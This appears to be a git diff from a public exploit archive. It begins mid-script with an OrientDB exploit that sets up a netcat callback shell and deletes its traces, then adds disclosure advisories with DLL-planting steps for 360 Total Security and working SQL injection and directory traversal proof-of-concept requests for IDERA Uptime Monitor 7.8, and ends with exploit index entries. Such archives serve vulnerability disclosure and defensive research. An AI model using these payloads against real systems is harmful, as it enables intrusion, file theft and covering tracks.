req = requests.post("http://%s:%s/function/%s/%s"%(target,port,databases[0],func_name),auth=('writer','writer'))
#print req.status_code
#print req.text
if req.status_code == 200:
print "[+] Open netcat at port 8081.."
else:
print "[+] Exploitation failed at last step, try running the script again."
print req.status_code
print req.text
#print "[+] Deleting traces.."
req = requests.delete("http://%s:%s/document/%s/%s"%(target,port,databases[0],func_id),auth=('writer','writer'))
priv1 = run_queries("REVOKE","database.class.ouser","Cleaning Up..database.class.ouser")
priv2 = run_queries("REVOKE","database.function","Cleaning Up..database.function")
priv3 = run_queries("REVOKE","database.systemclusters","Cleaning Up..database.systemclusters")
#print req.status_code
#print req.text
def main():
target = sys.argv[1]
#port = sys.argv[1] if sys.argv[1] else 2480
try:
port = sys.argv[2] if sys.argv[2] else 2480
#print port
except:
port = 2480
if priv_escalation(target,port):
exploit(target,port)
else:
print "[+] Target not vulnerable"
main()
```

32
exploits/windows/remote/44069.md Normal file
View file

@ -0,0 +1,32 @@
## Vulnerability Summary
The following advisory describes an Privileged Escalation vulnerability found in 360 Total Security.
360 Total Security offers your PC complete protection from Viruses, Trojans and other emerging threats.
Whether you are shopping online, downloading files or chatting with your friends you can be sure that 360 Total Security is there to keep you safe and your computer optimized. Clean-up utility is just one click away to keep your PC in optimal condition.
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
The vendor has released patches to address this vulnerability and has only provided these details in response to our query on the status: “We will release this patch on 7/7”
CVE: CVE-2017-12653
## Vulnerability Details
When 360 Total security is load on Windows machine the binaries try to load a DLL (Shcore.dll) in order to display correctly in High DPI displays.
360 Total security install Shcore.dll on Windows 8.1 and above, but not in previous versions (for example Windows 7 and XP). For this reason, the administration components of 360 Total Security try to find and load this DLL in Windows 7 too, where it does not exist.
Placing a DLL named Shcore.dll in a directory listed in the PATH system variable will load this in the memory space of 360 software. Loading the DLL inside a 360 administration process gives us privileges of administrator.
## Proof of Concept
Install 360 Total Security and optionally update to the latest version
Log into a Windows 7 and create a DLL planting environment
The easiest way is to install Python for Windows
“Add Python to the path” in the installer (most common install option)
Log in as a totally unprivileged user and copy the DLL renamed to Shcore.dll to C:\Python27 (in case you used Python as the DLL planting vector)
Now there are two options in order to trigger the vulnerability
In case the administrator is not logged in, log in as administrator (fastest way)
If the administrator is already logged in it will take several minutes. The reason is, 360 launches periodically processes in the background. Any of them will trigger the vulnerability and execute the code. Test have shown this is a matter of minutes.

740
exploits/windows/webapps/42091.txt
View file

File diff suppressed because it is too large Load diff

269
exploits/windows/webapps/44071.md Normal file
View file

@ -0,0 +1,269 @@
## Vulnerabilities Summary
The following advisory describe three (3) vulnerabilities found in IDERA Uptime Monitor version 7.8.
“IDERA Uptime Monitor is a Proactively monitor physical servers, virtual machines, network devices, applications, and services across multiple platforms running on-premise, remotely, or in the Cloud. Uptime Infrastructure Monitor provides a unified view of IT environment health and a GUI that is easily customizable, with a drag-anddrop dashboard design. Create private IT dashboards, team dashboards (server, application, capacity and networking teams, and even the specialist practitioner such as SharePoint farm administrators, etc.), and a network operations center (NOC) for the entire datacenter in minutes.”
The vulnerabilities found are:
SQL Injection (1)
SQL Injection (2)
Directory Traversal and File Access
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
We notified IDERA about the vulnerabilities back in March 2017, repeated attempts to re-establish contact and get some answers on the status of the patch for this vulnerabilities went unanswered. At this time there is no solution or workaround for this vulnerability.
CVEs:
SQL Injection (1) CVE-2017-11470
SQL Injection (2) CVE-2017-11471
Directory Traversal and File Access CVE-2017-11469
## Vulnerabilities Details
## SQL Injection (1)
IDERA Uptime Monitor 7.8 is affected by multiple SQL injection vulnerabilities. User controlled data is included in SQL queries made by the application without first being properly sanitized. As a result a remote unauthenticated user can inject arbitrary SQL queries into the applications back-end database
The SQL injection vulnerability is located in “/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php”:
```
if (isset($_GET['query_type'])) {
$query_type = $_GET['query_type'];
}
if (isset($_GET['uptime_offset'])) {
$offset = $_GET['uptime_offset'];
}
if (isset($_GET['time_frame'])) {
$time_frame = $_GET['time_frame'];
} else {
$time_frame = 3;
}
if (isset($_GET['metricType'])) {
$metricType = $_GET['metricType'];
}
if (isset($_GET['element'])) {
$vmware_object_id = $_GET['element'];
}
$json = array();
$oneElement = array();
$performanceData = array();
//date_default_timezone_set('UTC');
$db = new uptimeDB;
if ($db - & gt; connectDB()) {
echo "";
} else {
echo "unable to connect to DB exiting";
exit(1);
}
if ($query_type == "osperf-Mem") {
$min_mem_usage_array = array();
$max_mem_usage_array = array();
$avg_mem_usage_array = array();
$sql = "SELECT
e.entity_id,
e.display_name as NAME,
date(s.sample_time) as SAMPLE_TIME,
min(a.free_mem) as MIN_MEM_USAGE,
max(a.free_mem) as MAX_MEM_USAGE,
avg(a.free_mem) as AVG_MEM_USAGE,
min(c.memsize) as TOTAL_CAPACITY,
max(c.memsize),
avg(c.memsize),
day(s.sample_time),
month(s.sample_time),
year(s.sample_time)
FROM
performance_aggregate a, performance_sample s, entity e, entity_configuration c
WHERE
s.id = a.sample_id AND
s.uptimehost_id = e.entity_id AND
e.entity_id = c.entity_id AND
s.sample_time & gt;
date_sub(now(), interval ". $time_frame . "
month) AND
e.entity_id = $vmware_object_id
GROUP BY
e.entity_id,
year(s.sample_time),
month(s.sample_time),
day(s.sample_time)
```
User controlled data entering the HTTP GET parameter “element” is included as part of an SQL query that is executed if the “$query_type” variable is equal to “osperf-Mem”. Because the value of the “$query_type” variable can also be set using the HTTP GET parameter “query_type”, a user can force the application to take the vulnerable code path, and execute the tainted SQL query. Visiting the following URL on a vulnerable installation will trigger the vulnerability, and return a verbose SQL error message.
```
/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperfMem&element='
```
## Proof of Concept
```
http://192.168.199.129:9999/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperf-Mem&element=1%20AND%20SLEEP(5)
## SQL Injection (2)
IDERA Uptime Monitor 7.8 is affected by multiple SQL injection vulnerabilities. User controlled data is included in SQL queries made by the application without first being properly sanitized. As a result a remote unauthenticated user can inject arbitrary SQL queries into the applications back-end database
The vulnerability is very similar in structure to the first SQL vulnerability, and is located in “/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php”
```
if (isset($_GET['query_type'])) {
$query_type = $_GET['query_type'];
}
if (isset($_GET['uptime_offset'])) {
$offset = $_GET['uptime_offset'];
}
if (isset($_GET['time_frame'])) {
$time_frame = $_GET['time_frame'];
} else {
$time_frame = 3;
}
if (isset($_GET['metricType'])) {
$metricType = $_GET['metricType'];
}
if (isset($_GET['element'])) {
$element_id = $_GET['element'];
}
$json = array();
$oneElement = array();
$performanceData = array();
//date_default_timezone_set('UTC');
$db = new uptimeDB;
if ($db - & gt; connectDB()) {
echo "";
} else {
echo "unable to connect to DB exiting";
exit(1);
}
if ($query_type == "xenserver-Mem") {
$min_mem_usage_array = array();
$max_mem_usage_array = array();
$avg_mem_usage_array = array();
$getXenServerMemUsedsql = "SELECT
e.entity_id,
e.display_name as NAME,
date(dd.sampletime) as SAMPLE_TIME,
min(dd.value) as MIN_MEM_USAGE,
max(dd.value) as MAX_MEM_USAGE,
avg(dd.value) as AVG_MEM_USAGE,
day(dd.sampletime),
month(dd.sampletime),
year(dd.sampletime)
FROM
erdc_base b, erdc_configuration c, erdc_parameter p,
erdc_decimal_data dd, erdc_instance i, entity e
WHERE
b.name = 'XenServer'
AND
b.erdc_base_id = c.erdc_base_id AND
b.erdc_base_id = p.erdc_base_id AND
p.name = 'hostMemUsed'
AND
p.erdc_parameter_id = dd.erdc_parameter_id AND
dd.erdc_instance_id = i.erdc_instance_id AND
dd.sampletime & gt;
date_sub(now(), interval ". $time_frame . "
month)
AND
i.entity_id = e.entity_id AND
e.entity_id = $element_id
GROUP BY
e.entity_id,
year(dd.sampletime),
month(dd.sampletime),
day(dd.sampletime)
";
```
Visiting the following URL will elicit a verbose SQL message from the vulnerable web application.
```
/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserver-Mem&time_frame=1&element='
```
## Proof of Concept
```
http://192.168.199.129:9999/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserverMem&time_frame=1&element=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))tayk)
```
## Directory Traversal and File Access
User controlled input is not sufficiently sanitized, and then passed to a function responsible for accessing the filesystem. Successful exploitation of this vulnerability enables a remote unauthenticated user to read the content of any file existing on the host, this includes files located outside of the web root folder.
The vulnerable code can be found in get2post.php file:
```
if(isset($_GET["file_name"]) && $_GET["file_name"] != null){
$fileName = $_GET["file_name"];
$data = file_get_contents($fileName);
$data = str_replace("\"", '"', $data);
unlink($fileName);
print("<input type=\"hidden\" name=\"script\" value=\"".$data."\">\n");
```
User controlled data entering the HTTP GET parameter “file_name” is sanitized by removing all occurrences of the “\” character, and is then passed to the “file_get_contents” function. Next, then contents of the file (now in the $data variable) is printed in the applications HTTP response.
## Proof of Concept
The following HTTP GET request provides proof-of-concept that will retrieve the contents of a file named “test.txt” that exists in the root of “C:\”
```
GET
/wizards/get2post.php?file_name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5ctest.t
xt HTTP/1.1
Host: 192.168.199.129:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101
Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: PHPSESSID=8q7o2ckle9c6lcte045t7dufe2; cookieId=8q7o2ckle9c6lcte045t7dufe2
Connection: close
Upgrade-Insecure-Requests: 1
```
After executing this proof-of-concept against the vulnerable host, the following HTTP response was received containing the contents of the “test.txt” file that was placed in the root of “C:\”
```
HTTP/1.1 200 OK
Date: Mon, 06 Mar 2017 15:12:05 GMT
Server: Apache/2.4.20 (Win64) PHP/5.4.45 OpenSSL/1.0.2g
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 796
Connection: close
Content-Type: text/html
<html>
<head>
<title>Processing...</title>
</head>
<body onLoad="document.form.submit()">
<form name="form" action="../main.php?section=ERDCInstance&subsection=add"
method="post">
<input type="hidden" name="file_name" value="..\..\..\..\..\test.txt">
<input type="hidden" name="script"
value="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
<input type="hidden" name="category" value="agentless">
<input type="hidden" name="isWizard" value="1">
<input type="hidden" name="wizardPage" value="1">
<input type="hidden" name="wizardNumPages" value="2">
<input type="hidden" name="wizardTask" value="pageContinue">
<input type="hidden" name="visitedPage[1]" value="1">
<input type="hidden" name="fromGet2Post" value="true">
<img src="/images/InProgress.gif">
</form>
</body>
</html>
```

50
files_exploits.csv
View file

@ -5488,12 +5488,25 @@ id,file,description,date,author,type,platform,port
43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php, 43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php,
42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows, 42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows,
43972,exploits/multiple/dos/43972.txt,"Claymore Dual GPU Miner 10.5 - Format String",2018-02-05,res1n,dos,multiple,3333 43972,exploits/multiple/dos/43972.txt,"Claymore Dual GPU Miner 10.5 - Format String",2018-02-05,res1n,dos,multiple,3333
43986,exploits/hardware/dos/43986.py,"Cisco ASA - Crash PoC",2018-02-07,"Sean Dillon",dos,hardware, 43986,exploits/hardware/dos/43986.py,"Cisco ASA - Crash (PoC)",2018-02-07,"Sean Dillon",dos,hardware,
43992,exploits/multiple/dos/43992.py,"Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption",2018-02-07,"Juan Sacco",dos,multiple,2000 43992,exploits/multiple/dos/43992.py,"Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption",2018-02-07,"Juan Sacco",dos,multiple,2000
43996,exploits/android/dos/43996.txt,"Android - 'getpidcon' Permission Bypass in KeyStore Service",2018-02-07,"Google Security Research",dos,android, 43996,exploits/android/dos/43996.txt,"Android - 'getpidcon' Permission Bypass in KeyStore Service",2018-02-07,"Google Security Research",dos,android,
43998,exploits/multiple/dos/43998.txt,"Multiple OEM - 'nsd' Remote Stack Format String (PoC)",2017-12-14,bashis,dos,multiple, 43998,exploits/multiple/dos/43998.txt,"Multiple OEM - 'nsd' Remote Stack Format String (PoC)",2017-12-14,bashis,dos,multiple,
44007,exploits/macos/dos/44007.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'",2018-02-09,"Google Security Research",dos,macos, 44007,exploits/macos/dos/44007.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'",2018-02-09,"Google Security Research",dos,macos,
44035,exploits/windows/dos/44035.py,"GNU binutils 2.26.1 - Integer Overflow (POC)",2018-02-14,r4xis,dos,windows, 44035,exploits/windows/dos/44035.py,"GNU binutils 2.26.1 - Integer Overflow (PoC)",2018-02-14,r4xis,dos,windows,
44046,exploits/windows/dos/44046.md,"K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read",2017-10-23,SecuriTeam,dos,windows,
44053,exploits/linux/dos/44053.md,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,dos,linux,
44057,exploits/php/dos/44057.md,"Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service",2017-08-30,SecuriTeam,dos,php,
44075,exploits/windows/dos/44075.txt,"Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)",2018-02-15,"Google Security Research",dos,windows,
44076,exploits/windows/dos/44076.js,"Microsoft Edge Chakra JIT - Memory Corruption",2018-02-15,"Google Security Research",dos,windows,
44077,exploits/windows/dos/44077.js,"Microsoft Edge Chakra JIT - ImplicitCallFlags Checks Bypass",2018-02-15,"Google Security Research",dos,windows,
44078,exploits/windows/dos/44078.js,"Microsoft Edge Chakra JIT - Array Type Confusion via InitProto Instructions",2018-02-15,"Google Security Research",dos,windows,
44079,exploits/windows/dos/44079.js,"Microsoft Edge Chakra JIT - 'Array.prototype.reverse' Array Type Confusion",2018-02-15,"Google Security Research",dos,windows,
44080,exploits/windows/dos/44080.js,"Microsoft Edge Chakra JIT - 'NewScObjectNoCtor' Array Type Confusion",2018-02-15,"Google Security Research",dos,windows,
44081,exploits/windows/dos/44081.js,"Microsoft Edge Chakra JIT - 'LdThis' Type Confusion",2018-02-15,"Google Security Research",dos,windows,
44082,exploits/multiple/dos/44082.txt,"Pdfium - Pattern Shading Integer Overflows",2018-02-15,"Google Security Research",dos,multiple,
44083,exploits/multiple/dos/44083.txt,"Pdfium - Out-of-Bounds Read with Shading Pattern Backed by Pattern Colorspace",2018-02-15,"Google Security Research",dos,multiple,
44084,exploits/multiple/dos/44084.js,"Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow",2018-02-15,"Google Security Research",dos,multiple,
41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware, 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows, 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows, 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
@ -9325,6 +9338,11 @@ id,file,description,date,author,type,platform,port
44023,exploits/linux/local/44023.rb,"Juju-run Agent - Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux, 44023,exploits/linux/local/44023.rb,"Juju-run Agent - Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux, 44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux, 44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
44042,exploits/windows/local/44042.md,"Hotspot Shield - Information Disclosure",2018-01-30,SecuriTeam,local,windows,
44049,exploits/linux/local/44049.md,"Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation",2017-11-23,SecuriTeam,local,linux,
44063,exploits/windows/local/44063.md,"Nitro Pro PDF - Multiple Vulnerabilities",2017-07-24,SecuriTeam,local,windows,
44064,exploits/linux/local/44064.md,"Odoo CRM 10.0 - Code Execution",2017-06-30,SecuriTeam,local,linux,
44066,exploits/windows/local/44066.md,"Dashlane - DLL Hijacking",2017-08-03,SecuriTeam,local,windows,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android, 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple, 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows, 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -9372,7 +9390,7 @@ id,file,description,date,author,type,platform,port
41907,exploits/linux/local/41907.c,"Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config",2017-04-20,"Google Security Research",local,linux, 41907,exploits/linux/local/41907.c,"Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config",2017-04-20,"Google Security Research",local,linux,
41908,exploits/windows_x86-64/local/41908.txt,"Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation",2017-04-20,"Google Security Research",local,windows_x86-64, 41908,exploits/windows_x86-64/local/41908.txt,"Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation",2017-04-20,"Google Security Research",local,windows_x86-64,
41917,exploits/windows/local/41917.py,"Dell Customer Connect 1.3.28.0 - Local Privilege Escalation",2017-04-25,"Kacper Szurek",local,windows, 41917,exploits/windows/local/41917.py,"Dell Customer Connect 1.3.28.0 - Local Privilege Escalation",2017-04-25,"Kacper Szurek",local,windows,
41923,exploits/linux/local/41923.txt,"LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation",2017-04-25,"G. Geshev",local,linux, 41923,exploits/linux/local/41923.txt,"LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation",2017-04-25,"G. Geshev",local,linux,
41933,exploits/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",local,windows, 41933,exploits/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",local,windows,
41951,exploits/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Local Privilege Escalation",2017-05-01,"Han Sahin",local,osx, 41951,exploits/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Local Privilege Escalation",2017-05-01,"Han Sahin",local,osx,
41952,exploits/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Local Privilege Escalation",2017-05-01,"Han Sahin",local,macos, 41952,exploits/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Local Privilege Escalation",2017-05-01,"Han Sahin",local,macos,
@ -16016,6 +16034,14 @@ id,file,description,date,author,type,platform,port
44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux, 44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux,
44027,exploits/windows/remote/44027.py,"CloudMe Sync < 1.11.0 - Buffer Overflow",2018-02-13,hyp3rlinx,remote,windows, 44027,exploits/windows/remote/44027.py,"CloudMe Sync < 1.11.0 - Buffer Overflow",2018-02-13,hyp3rlinx,remote,windows,
44031,exploits/windows/remote/44031.html,"Advantech WebAccess 8.3.0 - Remote Code Execution",2018-02-13,"Nassim Asrir",remote,windows, 44031,exploits/windows/remote/44031.html,"Advantech WebAccess 8.3.0 - Remote Code Execution",2018-02-13,"Nassim Asrir",remote,windows,
44047,exploits/linux/remote/44047.md,"Trustwave SWG 11.8.0.27 - SSH Unauthorized Access",2017-12-26,SecuriTeam,remote,linux,
44048,exploits/hardware/remote/44048.md,"Ichano AtHome IP Cameras - Multiple Vulnerabilities",2017-12-19,SecuriTeam,remote,hardware,
44052,exploits/linux/remote/44052.md,"Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution",2017-11-01,SecuriTeam,remote,linux,
44055,exploits/windows/remote/44055.md,"Ikraus Anti Virus 2.16.7 - Remote Code Execution",2017-10-16,SecuriTeam,remote,windows,
44067,exploits/windows/remote/44067.md,"McAfee Security Scan Plus - Remote Command Execution",2017-07-30,SecuriTeam,remote,windows,
44068,exploits/windows/remote/44068.md,"OrientDB - Code Execution",2017-07-13,SecuriTeam,remote,windows,
44069,exploits/windows/remote/44069.md,"360 Total Security - Local Privilege Escalation",2017-07-12,SecuriTeam,remote,windows,
44073,exploits/linux/remote/44073.md,"HPE Intelligent Management Center (iMC) 7.2 (E0403P10) - Code Execution",2017-06-02,SecuriTeam,remote,linux,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@ -38044,6 +38070,24 @@ id,file,description,date,author,type,platform,port
44037,exploits/php/webapps/44037.txt,"SOA School Management - 'access_login' SQL Injection",2018-02-14,L0RD,webapps,php, 44037,exploits/php/webapps/44037.txt,"SOA School Management - 'access_login' SQL Injection",2018-02-14,L0RD,webapps,php,
44038,exploits/php/webapps/44038.txt,"userSpice 4.3 - Cross-Site Scripting",2018-02-14,"Dolev Farhi",webapps,php, 44038,exploits/php/webapps/44038.txt,"userSpice 4.3 - Cross-Site Scripting",2018-02-14,"Dolev Farhi",webapps,php,
44039,exploits/linux/webapps/44039.txt,"Dell EMC Isilon OneFS - Multiple Vulnerabilities",2018-02-14,"Core Security",webapps,linux, 44039,exploits/linux/webapps/44039.txt,"Dell EMC Isilon OneFS - Multiple Vulnerabilities",2018-02-14,"Core Security",webapps,linux,
44041,exploits/multiple/webapps/44041.txt,"Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution",2017-03-17,SecuriTeam,webapps,multiple,
44043,exploits/hardware/webapps/44043.md,"iBall WRA150N - Multiple Vulnerabilities",2018-01-29,SecuriTeam,webapps,hardware,
44044,exploits/php/webapps/44044.md,"GitStack - Unauthenticated Remote Code Execution",2018-01-15,SecuriTeam,webapps,php,
44045,exploits/php/webapps/44045.md,"Monstra CMS - Remote Code Execution",2017-12-06,SecuriTeam,webapps,php,
44050,exploits/php/webapps/44050.md,"Ametys CMS 4.0.2 - Unauthenticated Password Reset",2017-11-07,SecuriTeam,webapps,php,
44051,exploits/linux/webapps/44051.md,"DblTek - Multiple Vulnerabilities",2017-11-21,SecuriTeam,webapps,linux,
44054,exploits/linux/webapps/44054.md,"FiberHome - Directory Traversal",2017-10-13,SecuriTeam,webapps,linux,
44056,exploits/php/webapps/44056.md,"PHP Melody 2.7.3 - Multiple Vulnerabilities",2017-10-09,SecuriTeam,webapps,php,
44058,exploits/hardware/webapps/44058.md,"Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure",2017-08-03,SecuriTeam,webapps,hardware,
44059,exploits/php/webapps/44059.md,"Horde Groupware 5.2.21 - Unauthorized File Download",2017-08-03,SecuriTeam,webapps,php,
44060,exploits/php/webapps/44060.md,"QNAP HelpDesk < 1.1.12 - SQL Injection",2017-10-09,SecuriTeam,webapps,php,
44061,exploits/hardware/webapps/44061.md,"Hanbanggaoke IP Camera - Arbitrary Password Change",2017-09-11,SecuriTeam,webapps,hardware,
44062,exploits/hardware/webapps/44062.md,"McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution",2017-09-07,SecuriTeam,webapps,hardware,
44065,exploits/hardware/webapps/44065.md,"Sophos XG Firewall 16.05.4 MR-4 - Path Traversal",2017-06-19,SecuriTeam,webapps,hardware,
44070,exploits/hardware/webapps/44070.md,"Cisco DPC3928 Router - Arbitrary File Disclosure",2017-05-10,SecuriTeam,webapps,hardware,
44071,exploits/windows/webapps/44071.md,"IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities",2017-06-08,SecuriTeam,webapps,windows,
44072,exploits/hardware/webapps/44072.md,"Geneko Routers - Unauthenticated Path Traversal",2017-07-16,SecuriTeam,webapps,hardware,
44074,exploits/hardware/webapps/44074.md,"Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution",2017-12-06,SecuriTeam,webapps,hardware,
41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80

Can't render this file because it is too large.